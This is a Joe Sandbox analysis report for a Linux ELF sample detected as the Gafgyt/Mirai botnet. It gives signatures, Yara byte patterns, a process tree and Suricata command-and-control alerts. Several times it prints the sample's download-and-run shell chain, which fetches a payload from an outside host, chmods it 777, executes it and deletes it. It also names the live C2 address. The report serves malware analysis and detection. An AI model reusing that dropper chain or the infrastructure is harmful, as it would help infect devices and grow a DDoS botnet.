Linux Analysis Report
x86.elf

Overview

General Information

Sample name:x86.elf
Analysis ID:1686581
Has dependencies:false
MD5:b1a9dfc6e42c89e400efad9451540b1e
SHA1:90bec36b5d46d4f4d06d19360d217b474c9d3f32
SHA256:5f0788259247b6d55e2d7dc87bd5ef445472cd3132b38971b3f252ee8f8ed91e
Tags:elf, user-abuse_ch
Infos:

Detection

Gafgyt, Mirai
Score:96
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Gafgyt
Yara detected Mirai
Contains symbols with names commonly found in malware
Opens /proc/net/* files useful for finding connected devices and routers
Creates hidden files and/or directories
Creates hidden files without content (potentially used as a mutex)
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "rm" command used to delete files or directories
Executes the "wget" command typically used for HTTP/S downloading
Reads the 'hosts' file potentially containing internal network hosts
Sample contains strings that are user agent strings indicative of HTTP manipulation
Sample tries to set the executable flag
Sets full permissions to files and/or directories
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1686581
Start date and time:2025-05-10 07:43:19 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 5s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:x86.elf
Detection:MAL
Classification:mal96.spre.troj.linELF@0/0@6/0
  • VT rate limit hit for: gay.energy
Command:/tmp/x86.elf
PID:5528
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
gosh that chinese family at the other table sure ate alot
Standard Error:
  • system is lnxubuntu20
  • x86.elf (PID: 5528, Parent: 5445, MD5: b1a9dfc6e42c89e400efad9451540b1e) Arguments: /tmp/x86.elf
    • x86.elf New Fork (PID: 5529, Parent: 5528)
    • sh (PID: 5529, Parent: 5528, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
      • sh New Fork (PID: 5533, Parent: 5529)
      • wget (PID: 5533, Parent: 5529, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -q http://gay.energy/.../vivid -O .....
      • sh New Fork (PID: 5534, Parent: 5529)
      • chmod (PID: 5534, Parent: 5529, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 .....
      • sh New Fork (PID: 5535, Parent: 5529)
      • sh (PID: 5535, Parent: 5529, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh ./.....
      • sh New Fork (PID: 5537, Parent: 5529)
      • rm (PID: 5537, Parent: 5529, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf .....
    • x86.elf New Fork (PID: 5530, Parent: 5528)
    • x86.elf New Fork (PID: 5531, Parent: 5528)
      • x86.elf New Fork (PID: 5532, Parent: 5531)
  • cleanup
Name: Bashlite, Gafgyt
Description: Bashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite

Name: Mirai
Description: Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums", many variants of the Mirai family have appeared, infecting mostly home networks all around the world.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
Source: x86.elf, Rule: JoeSecurity_Gafgyt, Description: Yara detected Gafgyt, Author: Joe Security
Source: x86.elf, Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Author: Joe Security
Source: x86.elf, Rule: Linux_Trojan_Gafgyt_28a2fe0c, Description: unknown, Author: unknown
      Source: x86.elf, Rule: Linux_Trojan_Gafgyt_a6a2adb9, Description: unknown, Author: unknown
      • 0xa27:$a: CC 01 C2 89 55 B4 8B 45 B4 C9 C3 55 48 89 E5 48 81 EC 90 00
      Source: x86.elf, Rule: Linux_Trojan_Gafgyt_9e9530a7, Description: unknown, Author: unknown
      • 0x95c0:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
      Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Author: Joe Security
      Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, Rule: Linux_Trojan_Gafgyt_28a2fe0c, Description: unknown, Author: unknown
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, Rule: Linux_Trojan_Gafgyt_a6a2adb9, Description: unknown, Author: unknown
        • 0xa27:$a: CC 01 C2 89 55 B4 8B 45 B4 C9 C3 55 48 89 E5 48 81 EC 90 00
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, Rule: Linux_Trojan_Gafgyt_9e9530a7, Description: unknown, Author: unknown
        • 0x95c0:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, Rule: Linux_Trojan_Gafgyt_f3d83a74, Description: unknown, Author: unknown
        • 0x94d:$a: DC 00 74 1B 83 7D E0 0A 75 15 83 7D E4 00 79 0F C7 45 C8 01 00
        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
        2025-05-10T07:44:16.758698+0200 | 2839489 | 1 | Malware Command and Control Activity Detected | 92.60.77.69 | 666 | 192.168.2.15 | 58154 | TCP
        2025-05-10T07:44:32.310593+0200 | 2839489 | 1 | Malware Command and Control Activity Detected | 92.60.77.69 | 666 | 192.168.2.15 | 58156 | TCP
        2025-05-10T07:44:47.867827+0200 | 2839489 | 1 | Malware Command and Control Activity Detected | 92.60.77.69 | 666 | 192.168.2.15 | 58158 | TCP
        2025-05-10T07:45:03.427653+0200 | 2839489 | 1 | Malware Command and Control Activity Detected | 92.60.77.69 | 666 | 192.168.2.15 | 58160 | TCP
        2025-05-10T07:45:18.988148+0200 | 2839489 | 1 | Malware Command and Control Activity Detected | 92.60.77.69 | 666 | 192.168.2.15 | 58162 | TCP
        2025-05-10T07:45:34.547050+0200 | 2839489 | 1 | Malware Command and Control Activity Detected | 92.60.77.69 | 666 | 192.168.2.15 | 58164 | TCP
        2025-05-10T07:45:50.109342+0200 | 2839489 | 1 | Malware Command and Control Activity Detected | 92.60.77.69 | 666 | 192.168.2.15 | 58166 | TCP
        2025-05-10T07:46:05.672211+0200 | 2839489 | 1 | Malware Command and Control Activity Detected | 92.60.77.69 | 666 | 192.168.2.15 | 58168 | TCP
        2025-05-10T07:46:21.231592+0200 | 2839489 | 1 | Malware Command and Control Activity Detected | 92.60.77.69 | 666 | 192.168.2.15 | 58170 | TCP
        2025-05-10T07:46:36.789043+0200 | 2839489 | 1 | Malware Command and Control Activity Detected | 92.60.77.69 | 666 | 192.168.2.15 | 58172 | TCP
        2025-05-10T07:46:52.349507+0200 | 2839489 | 1 | Malware Command and Control Activity Detected | 92.60.77.69 | 666 | 192.168.2.15 | 58174 | TCP
        2025-05-10T07:47:07.905258+0200 | 2839489 | 1 | Malware Command and Control Activity Detected | 92.60.77.69 | 666 | 192.168.2.15 | 58176 | TCP
        2025-05-10T07:47:23.461040+0200 | 2839489 | 1 | Malware Command and Control Activity Detected | 92.60.77.69 | 666 | 192.168.2.15 | 58178 | TCP
        2025-05-10T07:47:39.017777+0200 | 2839489 | 1 | Malware Command and Control Activity Detected | 92.60.77.69 | 666 | 192.168.2.15 | 58180 | TCP

        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
        2025-05-10T07:44:16.485852+0200 | 2839490 | 1 | Malware Command and Control Activity Detected | 192.168.2.15 | 58154 | 92.60.77.69 | 666 | TCP
        2025-05-10T07:44:32.037794+0200 | 2839490 | 1 | Malware Command and Control Activity Detected | 192.168.2.15 | 58156 | 92.60.77.69 | 666 | TCP
        2025-05-10T07:44:47.594854+0200 | 2839490 | 1 | Malware Command and Control Activity Detected | 192.168.2.15 | 58158 | 92.60.77.69 | 666 | TCP
        2025-05-10T07:45:03.154401+0200 | 2839490 | 1 | Malware Command and Control Activity Detected | 192.168.2.15 | 58160 | 92.60.77.69 | 666 | TCP
        2025-05-10T07:45:18.714205+0200 | 2839490 | 1 | Malware Command and Control Activity Detected | 192.168.2.15 | 58162 | 92.60.77.69 | 666 | TCP
        2025-05-10T07:45:34.274220+0200 | 2839490 | 1 | Malware Command and Control Activity Detected | 192.168.2.15 | 58164 | 92.60.77.69 | 666 | TCP
        2025-05-10T07:45:49.835535+0200 | 2839490 | 1 | Malware Command and Control Activity Detected | 192.168.2.15 | 58166 | 92.60.77.69 | 666 | TCP
        2025-05-10T07:46:05.397910+0200 | 2839490 | 1 | Malware Command and Control Activity Detected | 192.168.2.15 | 58168 | 92.60.77.69 | 666 | TCP
        2025-05-10T07:46:20.958201+0200 | 2839490 | 1 | Malware Command and Control Activity Detected | 192.168.2.15 | 58170 | 92.60.77.69 | 666 | TCP
        2025-05-10T07:46:36.516331+0200 | 2839490 | 1 | Malware Command and Control Activity Detected | 192.168.2.15 | 58172 | 92.60.77.69 | 666 | TCP
        2025-05-10T07:46:52.076642+0200 | 2839490 | 1 | Malware Command and Control Activity Detected | 192.168.2.15 | 58174 | 92.60.77.69 | 666 | TCP
        2025-05-10T07:47:07.632380+0200 | 2839490 | 1 | Malware Command and Control Activity Detected | 192.168.2.15 | 58176 | 92.60.77.69 | 666 | TCP
        2025-05-10T07:47:23.188326+0200 | 2839490 | 1 | Malware Command and Control Activity Detected | 192.168.2.15 | 58178 | 92.60.77.69 | 666 | TCP
        2025-05-10T07:47:38.744584+0200 | 2839490 | 1 | Malware Command and Control Activity Detected | 192.168.2.15 | 58180 | 92.60.77.69 | 666 | TCP

        AV Detection

        Source: x86.elf, Avira: detected
        Source: x86.elf, Virustotal: Detection: 62%
        Source: x86.elf, ReversingLabs: Detection: 68%

        Spreading

        Source: /tmp/x86.elf (PID: 5528), Opens: /proc/net/route

        Networking

        Source: Network traffic, Suricata IDS: 2839490 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) : 192.168.2.15:58160 -> 92.60.77.69:666
        Source: Network traffic, Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.15:58160
        Source: Network traffic, Suricata IDS: 2839490 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) : 192.168.2.15:58172 -> 92.60.77.69:666
        Source: Network traffic, Suricata IDS: 2839490 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) : 192.168.2.15:58166 -> 92.60.77.69:666
        Source: Network traffic, Suricata IDS: 2839490 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) : 192.168.2.15:58170 -> 92.60.77.69:666
        Source: Network traffic, Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.15:58166
        Source: Network traffic, Suricata IDS: 2839490 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) : 192.168.2.15:58158 -> 92.60.77.69:666
        Source: Network traffic, Suricata IDS: 2839490 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) : 192.168.2.15:58164 -> 92.60.77.69:666
        Source: Network traffic, Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.15:58172
        Source: Network traffic, Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.15:58170
        Source: Network traffic, Suricata IDS: 2839490 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) : 192.168.2.15:58168 -> 92.60.77.69:666
        Source: Network traffic, Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.15:58158
        Source: Network traffic, Suricata IDS: 2839490 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) : 192.168.2.15:58154 -> 92.60.77.69:666
        Source: Network traffic, Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.15:58168
        Source: Network traffic, Suricata IDS: 2839490 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) : 192.168.2.15:58178 -> 92.60.77.69:666
        Source: Network traffic, Suricata IDS: 2839490 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) : 192.168.2.15:58162 -> 92.60.77.69:666
        Source: Network traffic, Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.15:58178
        Source: Network traffic, Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.15:58164
        Source: Network traffic, Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.15:58162
        Source: Network traffic, Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.15:58154
        Source: Network traffic, Suricata IDS: 2839490 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) : 192.168.2.15:58174 -> 92.60.77.69:666
        Source: Network traffic, Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.15:58174
        Source: Network traffic, Suricata IDS: 2839490 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) : 192.168.2.15:58176 -> 92.60.77.69:666
        Source: Network traffic, Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.15:58176
        Source: Network traffic, Suricata IDS: 2839490 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) : 192.168.2.15:58156 -> 92.60.77.69:666
        Source: Network traffic, Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.15:58156
        Source: Network traffic, Suricata IDS: 2839490 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) : 192.168.2.15:58180 -> 92.60.77.69:666
        Source: Network traffic, Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.15:58180
        Source: global traffic, TCP traffic: 192.168.2.15:58154 -> 92.60.77.69:666
        Source: /bin/sh (PID: 5533), Wget executable: /usr/bin/wget -> wget -q http://gay.energy/.../vivid -O .....
        Source: /usr/bin/wget (PID: 5533), Reads hosts file: /etc/hosts
        Source: unknown, TCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: global traffic, DNS traffic detected: DNS query: gay.energy
        Source: global traffic, DNS traffic detected: DNS query: daisy.ubuntu.com

        System Summary

        Source: x86.elf, type: SAMPLE, Matched rules (Author: unknown): Linux_Trojan_Gafgyt_28a2fe0c, Linux_Trojan_Gafgyt_a6a2adb9, Linux_Trojan_Gafgyt_9e9530a7, Linux_Trojan_Gafgyt_f3d83a74, Linux_Trojan_Gafgyt_a0a4de11, Linux_Trojan_Gafgyt_d4227dbf, Linux_Trojan_Gafgyt_09c3070e, Linux_Trojan_Gafgyt_46eec778, Linux_Trojan_Gafgyt_d996d335, Linux_Trojan_Gafgyt_620087b9, Linux_Trojan_Gafgyt_dd0d6173, Linux_Trojan_Gafgyt_779e142f, Linux_Trojan_Gafgyt_cf84c9f2, Linux_Trojan_Gafgyt_859042a0, Linux_Trojan_Gafgyt_33b4111a, Linux_Trojan_Gafgyt_862c4e0e
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY, Matched rules (Author: unknown): Linux_Trojan_Gafgyt_28a2fe0c, Linux_Trojan_Gafgyt_a6a2adb9, Linux_Trojan_Gafgyt_9e9530a7, Linux_Trojan_Gafgyt_f3d83a74, Linux_Trojan_Gafgyt_a0a4de11, Linux_Trojan_Gafgyt_d4227dbf, Linux_Trojan_Gafgyt_09c3070e, Linux_Trojan_Gafgyt_46eec778, Linux_Trojan_Gafgyt_d996d335, Linux_Trojan_Gafgyt_620087b9, Linux_Trojan_Gafgyt_dd0d6173, Linux_Trojan_Gafgyt_779e142f, Linux_Trojan_Gafgyt_cf84c9f2, Linux_Trojan_Gafgyt_859042a0, Linux_Trojan_Gafgyt_33b4111a, Linux_Trojan_Gafgyt_862c4e0e
        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY, Matched rules (Author: unknown): Linux_Trojan_Gafgyt_28a2fe0c, Linux_Trojan_Gafgyt_a6a2adb9, Linux_Trojan_Gafgyt_9e9530a7, Linux_Trojan_Gafgyt_f3d83a74, Linux_Trojan_Gafgyt_a0a4de11, Linux_Trojan_Gafgyt_d4227dbf, Linux_Trojan_Gafgyt_09c3070e, Linux_Trojan_Gafgyt_46eec778, Linux_Trojan_Gafgyt_d996d335, Linux_Trojan_Gafgyt_620087b9, Linux_Trojan_Gafgyt_dd0d6173, Linux_Trojan_Gafgyt_779e142f, Linux_Trojan_Gafgyt_cf84c9f2, Linux_Trojan_Gafgyt_859042a0, Linux_Trojan_Gafgyt_33b4111a, Linux_Trojan_Gafgyt_862c4e0e
        Source: 5528.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY, Matched rules (Author: unknown): Linux_Trojan_Gafgyt_28a2fe0c, Linux_Trojan_Gafgyt_a6a2adb9, Linux_Trojan_Gafgyt_9e9530a7, Linux_Trojan_Gafgyt_f3d83a74, Linux_Trojan_Gafgyt_a0a4de11, Linux_Trojan_Gafgyt_d4227dbf, Linux_Trojan_Gafgyt_09c3070e, Linux_Trojan_Gafgyt_46eec778, Linux_Trojan_Gafgyt_d996d335, Linux_Trojan_Gafgyt_620087b9, Linux_Trojan_Gafgyt_dd0d6173, Linux_Trojan_Gafgyt_779e142f, Linux_Trojan_Gafgyt_cf84c9f2, Linux_Trojan_Gafgyt_859042a0, Linux_Trojan_Gafgyt_33b4111a, Linux_Trojan_Gafgyt_862c4e0e
        Source: Process Memory Space: x86.elf PID: 5528, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Source: Process Memory Space: x86.elf PID: 5530, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Source: Process Memory Space: x86.elf PID: 5531, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Source: ELF static info symbol of initial sampleName: vseattack
        Source: x86.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_28a2fe0c, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
        Source: x86.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_a6a2adb9, reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = cdd0bb9ce40a000bb86b0c76616fe71fb7dbb87a044ddd778b7a07fdf804b877, id = a6a2adb9-9d54-42d4-abed-5b30d8062e97, last_modified = 2021-09-16
        Source: x86.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_9e9530a7, reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
        Source: x86.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_f3d83a74, reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 1c5df68501b688905484ed47dc588306828aa7c114644428e22e5021bb39bd4a, id = f3d83a74-2888-435a-9a3c-b7de25084e9a, last_modified = 2021-09-16
        Source: x86.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_a0a4de11, reference_sample = cf1ca1d824c8687e87a5b0275a0e39fa101442b4bbf470859ddda9982f9b3417, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 891cfc6a4c38fb257ada29050e0047bd1301e8f0a6a1a919685b1fcc2960b047, id = a0a4de11-fe65-449f-a990-ad5f18ac66f0, last_modified = 2021-09-16
        Source: x86.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_d4227dbf, reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
        Source: x86.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_09c3070e, reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 84fad96b60b297736c149e14de12671ff778bff427ab7684df2c541a6f6d7e7d, id = 09c3070e-4b71-45a0-aa62-0cc6e496644a, last_modified = 2021-09-16
        Source: x86.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_46eec778, reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2602371a40171870b1cf024f262e95a2853de53de39c3a6cd3de811e81dd3518, id = 46eec778-7342-4ef7-adac-35bc0cdb9867, last_modified = 2021-09-16
        Source: x86.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_d996d335, reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
        Source: x86.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_620087b9, reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
        Source: x86.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_dd0d6173, reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 5e2cb111c2b712951b71166111d339724b4f52b93f90cb474f1e67598212605f, id = dd0d6173-b863-45cf-9348-3375a4e624cf, last_modified = 2021-09-16
        Source: x86.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_779e142f, reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 83377b6fa77fda4544c409487d2d2c1ddcef8f7d4120f49a18888c7536f3969f, id = 779e142f-b867-46e6-b1fb-9105976f42fd, last_modified = 2021-09-16
        Source: x86.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_cf84c9f2, reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = bb766b356c3e8706740e3bb9b4a7171d8eb5137e09fc7ab6952412fa55e2dcfc, id = cf84c9f2-7435-4faf-8c5f-d14945ffad7a, last_modified = 2021-09-16
        Source: x86.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_859042a0, reference_sample = 41615d3f3f27f04669166fdee3996d77890016304ee87851a5f90804d6d4a0b0, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a27bcaa16edceda3dc5a80803372c907a7efd00736c7859c5a9d6a2cf56a8eec, id = 859042a0-a424-4c83-944b-ed182b342998, last_modified = 2021-09-16
        Source: x86.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_33b4111a, reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
        Source: x86.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_862c4e0e, reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2a6b4f8d8fb4703ed26bdcfbbb5c539dc451c8b90649bee80015c164eae4c281, id = 862c4e0e-83a4-458b-8c00-f2f3cf0bf9db, last_modified = 2021-09-16
        Source: classification engineClassification label: mal96.spre.troj.linELF@0/0@6/0
        Source: x86.elf ELF static info symbol of initial sample: libc/string/x86_64/bzero.S
        Source: x86.elf ELF static info symbol of initial sample: libc/string/x86_64/memcpy.S
        Source: x86.elf ELF static info symbol of initial sample: libc/string/x86_64/mempcpy.S
        Source: x86.elf ELF static info symbol of initial sample: libc/string/x86_64/memset.S
        Source: x86.elf ELF static info symbol of initial sample: libc/string/x86_64/strchr.S
        Source: x86.elf ELF static info symbol of initial sample: libc/string/x86_64/strcmp.S
        Source: x86.elf ELF static info symbol of initial sample: libc/string/x86_64/strcpy.S
        Source: x86.elf ELF static info symbol of initial sample: libc/string/x86_64/strcspn.S
        Source: x86.elf ELF static info symbol of initial sample: libc/string/x86_64/strlen.S
        Source: x86.elf ELF static info symbol of initial sample: libc/string/x86_64/strpbrk.S
        Source: x86.elf ELF static info symbol of initial sample: libc/string/x86_64/strspn.S
        Source: x86.elf ELF static info symbol of initial sample: libc/sysdeps/linux/x86_64/crt1.S
        Source: x86.elf ELF static info symbol of initial sample: libc/sysdeps/linux/x86_64/crti.S
        Source: x86.elf ELF static info symbol of initial sample: libc/sysdeps/linux/x86_64/crtn.S
        Source: x86.elf ELF static info symbol of initial sample: libc/sysdeps/linux/x86_64/vfork.S
        Source: /usr/bin/wget (PID: 5533) File: /tmp/.....
        Source: /bin/sh (PID: 5535) Directory: /tmp/.....
        Source: /usr/bin/wget (PID: 5533) Empty hidden file: /tmp/.....
        Source: /tmp/x86.elf (PID: 5529) Shell command executed: /bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
        Source: /bin/sh (PID: 5534) Chmod executable: /usr/bin/chmod -> chmod 777 .....
        Source: /bin/sh (PID: 5537) Rm executable: /usr/bin/rm -> rm -rf .....
        Source: /bin/sh (PID: 5533) Wget executable: /usr/bin/wget -> wget -q http://gay.energy/.../vivid -O .....
